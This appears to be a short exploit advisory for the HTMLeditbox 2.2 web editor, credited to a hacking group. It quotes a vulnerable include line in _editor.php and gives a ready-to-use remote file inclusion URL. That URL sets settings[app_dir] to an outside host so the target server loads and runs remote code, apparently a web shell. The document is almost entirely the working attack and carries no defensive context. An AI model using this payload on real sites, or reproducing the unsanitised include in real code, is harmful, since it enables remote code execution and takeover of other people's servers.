|
+++++++
name & version :HTMLeditbox & 2.2
vendor: http://www.labs4.com
by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru
bug :
_editor.php @include($settings[app_dir].'/inc/config.php');
exploit :
http://victim/_editor.php?settings[app_dir]=http://shell
++++++